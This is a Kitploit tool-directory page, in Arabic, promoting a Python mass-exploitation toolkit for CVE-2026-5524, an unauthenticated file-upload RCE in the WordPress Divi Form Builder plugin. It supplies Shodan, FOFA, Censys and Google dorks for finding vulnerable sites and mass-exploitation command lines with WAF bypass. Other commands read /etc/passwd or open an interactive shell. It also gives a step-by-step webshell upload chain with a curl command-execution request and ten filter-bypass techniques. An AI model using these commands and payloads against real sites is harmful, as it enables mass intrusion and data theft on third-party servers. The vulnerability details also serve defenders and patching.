Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5524-PoC — مجموعة أدوات استغلال جماعي بلغة Python لـ CVE-2026-5524، وهي ثغرة تنفيذ أوامر عن بُعد عبر رفع ملفات دون مصادقة في إضافة Divi Form Builder الخاصة بـ WordPress، مع رفع webshell وتنفيذ الأوامر. | Kitploit
أدوات/GitHubGitHub/iicaicai/cve-2026-5524-poc
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتتجاوز WAFأمن الويباختبار الاختراقالفريق الأحمرتطوير الحمولاتحصان طروادة للوصول عن بعد
25منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
iicaicai/cve-2026-5524-poc

CVE-2026-5524-PoC

مجموعة أدوات استغلال جماعي بلغة Python لـ CVE-2026-5524، وهي ثغرة تنفيذ أوامر عن بُعد عبر رفع ملفات دون مصادقة في إضافة Divi Form Builder الخاصة بـ WordPress، مع رفع webshell وتنفيذ الأوامر.

عرض المستودع

CVE-2026-5524 — تنفيذ تعليمات برمجية عن بُعد (RCE) غير مُصادق عليه في Divi Form Builder

مجموعة أدوات استغلال جماعي لـ CVE-2026-5524، وهي ثغرة رفع ملفات عشوائية غير مُصادق عليها في إضافة WordPress Divi Form Builder <= 5.1.8 تؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

version Devon Aji python telegram

الحقلالقيمة
CVE2026-5524
CVSS9.8 (حرجة)
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
المتأثرDivi Form Builder <= 5.1.8
المُصحَّح5.1.9
النوعرفع ملفات غير مُصادق عليه يؤدي إلى RCE
الباحث0xd4rk5id3 - EnvoraSec

المحتويات

  • الوصف
  • Dorks
  • التثبيت
  • الاستخدام
    • هدف واحد
    • استغلال جماعي
    • تجاوز متقدم
    • تنفيذ الأوامر
  • تفاصيل الثغرة
  • تقنيات التجاوز
  • التقنيات المستخدمة
  • هيكل المشروع
  • مسار الهجوم
  • إخلاء المسؤولية

الوصف

تحتوي إضافة Divi Form Builder لـ WordPress على ثغرة رفع ملفات عشوائية غير مُصادق عليها. يمرر المعالج do_image_upload() المعامل acceptFileTypes المُتحكَّم فيه من المستخدم مباشرةً إلى تعبير نمطي (regular expression) يُستخدم للتحقق من امتدادات الملفات. من خلال توفير قيمة مثل phtml، يمكن للمهاجم تجاوز قاعدة .htaccess الخاصة بالإضافة التي تحظر امتداد .php فقط ورفع webshell بامتداد قابل للتنفيذ بـ PHP (.phtml، .phar، .php5، .php7، وما شابه ذلك).

بمجرد وصول الملف إلى /wp-content/uploads/de_fb_uploads/، ينفذه Apache كـ PHP، مما يمنح المهاجم تنفيذ تعليمات برمجية عن بُعد بصلاحيات مستخدم خادم الويب.

تم إصلاح المشكلة في Divi Form Builder 5.1.9.


Dorks

FOFA

body="de_fb_obj" && body="fb_nonce"

Shodan

http.html:"de_fb_obj" http.html:"fb_nonce"

Google

inurl:"/wp-content/plugins/divi-form-builder/"

ZoomEye

app:"WordPress" && body:"de_fb_obj"

Censys

services.http.response.body: "de_fb_obj"

التثبيت

المتطلبات: Python 3.8 أو أحدث على Linux أو macOS أو WSL.

git clone https://github.com/caterscam/CVE-2026-5524-PoC/
cd CVE-2026-5524-PoC
pip3 install -r requirements.txt

requirements.txt

requests>=2.28.0
urllib3>=1.26.0

الاستخدام

هدف واحد

python3 CVE-2026-5524.py -u https://target.com

استغلال جماعي

python3 CVE-2026-5524.py -l targets.txt --shell-file bypass.phtml --aggressive --no-verify -o pwned.jsonl -t 20

تجاوز متقدم

للأهداف الواقعة خلف WAF (NinjaFirewall، Wordfence، ModSecurity) أو ذات إعدادات Apache أو nginx مُحصَّنة.

python3 CVE-2026-5524.py -u https://target.com --shell-file bypass.phtml --aggressive --no-verify --debug

تنفيذ الأوامر

بعد نجاح الرفع، يمكن للسكربت تنفيذ أمر فورًا أو الدخول إلى shell تفاعلي.

python3 CVE-2026-5524.py -u https://target.com --cmd "id; uname -a; cat /etc/passwd"
python3 CVE-2026-5524.py -u https://target.com --shell

الخيارات

الخيارالوصف
-u URLعنوان URL لهدف واحد
-l FILEملف يحتوي على قائمة الأهداف، عنوان URL واحد لكل سطر
-t Nعدد الخيوط المتزامنة (افتراضي 10)
--timeout Nمهلة الطلب بالثواني (افتراضي 15)
-o FILEحفظ النتائج في ملف إخراج JSONL
--proxy URLتوجيه حركة المرور عبر بروكسي HTTP
--nonce HASHاستخدام nonce مُقدَّم يدويًا، وتخطي الاكتشاف التلقائي
--ext EXTفرض امتداد واحد بدلًا من قائمة التجاوز الكاملة
--shellالدخول إلى shell تفاعلي لـ RCE عند النجاح (هدف واحد فقط)
--cmd CMDتنفيذ أمر واحد على الهدف، ثم الخروج
--shell-file FILEرفع حمولة shell مخصصة بدلًا من المدمجة
--no-verifyتخطي خطوة التحقق من RCE بعد الرفع
--strict-verifyتأكيد أن عنوان URL للـ shell يُرجع HTTP 200 لتصفية الإيجابيات الكاذبة
--user-iniرفع dropper لـ .user.ini لبيئات PHP-FPM
--htaccessرفع .htaccess لإعادة التمكين لبيئات Apache
--aggressiveتمكين كل تقنية تجاوز متاحة
--null-byteتضمين محاولات null byte والامتداد المزدوج
--path-traversalمحاولة الرفع إلى أدلة فرعية /uploads/YYYY/MM/
--debugطباعة استجابات HTTP الخام للتشخيص

تفاصيل الثغرة

الكود المصاب

يبني المعالج المصاب تعبيرًا نمطيًا من مدخلات المستخدم دون تعقيم.

public function do_image_upload() {
    $accepted = $_POST['acceptFileTypes'];
    $pattern  = '/\\.(' . $accepted . ')$/i';

    if (preg_match($pattern, $filename)) {
        move_uploaded_file($tmp, $dest);
    }
}

بإرسال acceptFileTypes=phtml، يصبح التعبير النمطي الناتج /\.(phtml)$/i مطابقًا لأسماء الملفات المنتهية بـ .phtml، حتى مع أن ملف .htaccess الخاص بالإضافة يحظر امتداد .php فقط. ثم ينفذ Apache الملف المرفوع كـ PHP، مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

سلسلة الهجوم المؤكدة

  1. قم بزحف صفحة تتضمن نموذج Divi Form Builder (/، /contact، /quote، إلخ). أضف معامل ?nocache=<random> للتغلب على Varnish و WP Rocket وذاكرات التخزين المؤقت الأخرى للصفحات التي قد تقدم nonce قديمًا.

  2. استخرج قيمة fb_nonce من كائن JavaScript المُترجم:

    de_fb_obj = {"fb_nonce":"<10 hex characters>", ...}
    
  3. أرسل POST بنموذج multipart إلى /wp-admin/admin-ajax.php مع:

    action=de_fb_image_upload
    fb_nonce=<nonce>
    acceptFileTypes=phtml
    [email protected]
    
  4. اقرأ عنوان URL للملف من استجابة JSON:

    {"files":[{"name":"abc123.phtml","url":"https://target/wp-content/uploads/de_fb_uploads/abc123.phtml",...}]}
    
  5. اطلب الـ shell بأمر مُرمَّز بـ base64:

    curl "https://target/wp-content/uploads/de_fb_uploads/abc123.phtml?x=$(echo -n id | base64)"
    

تقنيات التجاوز

#التقنيةالأهداف
1امتدادات PHP بديلة .phtml، .phar، .php5، .php7، .php4، .pht، .shtmlقاعدة .htaccess الخاصة بالإضافة التي تحظر .php فقط
2تغيير حالة الأحرف .PHTML، .PHP5، .PhTmLتوقيعات WAF الحساسة لحالة الأحرف (NinjaFirewall)
3الامتداد المزدوج .phtml.jpg، .php.jpgسلوكيات التفاوض على المحتوى في Apache mod_mime
4null byte .php%00.jpg، .phtml%00.txtإصدارات PHP القديمة (أقل من 5.3.4) وبعض المحللات
5مسافة أو نقطة زائدة .php ، .php.Windows IIS وإصدارات Apache الأقدم
6تزييف Content-Type application/octet-streamجدران WAF التي تعتمد على ترويسة Content-Type في multipart
7رفع .htaccess حقيقي يعيد تمكين PHP لـ .gif، .png، .jpg، .txt، .html، إلخ.خوادم Apache مع AllowOverride All
8رفع .user.ini مع auto_prepend_fileبيئات PHP-FPM
9حقن اسم الملف عبر التلاعب بحدود multipartالبروكسيات وجدران WAF التي تعيد تحليل جسم الطلب
10اجتياز المسار ../shell.phtml في اسم الملفقيود دليل الإضافة

يجرب السكربت كل تقنية بترتيب الأولوية، وعند تفعيل --aggressive، يحاول كل واحدة حتى بعد أن يُبلّغ الرفع الأول عن النجاح.


التقنيات المستخدمة

سكربت الاستغلال

المكوّنالتقنية
اللغةPython 3.8+
عميل HTTPrequests
معالجة TLSurllib3 في الوضع غير الآمن للشهادات الموقعة ذاتيًا
التزامنconcurrent.futures.ThreadPoolExecutor للفحص الجماعي
التحليلre لاستخراج nonce، json لمعالجة الاستجابات
الترميزbase64 لمعامل أمر webshell
CLIargparse مع 19 خيارًا قابلًا للتهيئة

الـ shell المخصص (bypass.phtml)

تنزيل الأداة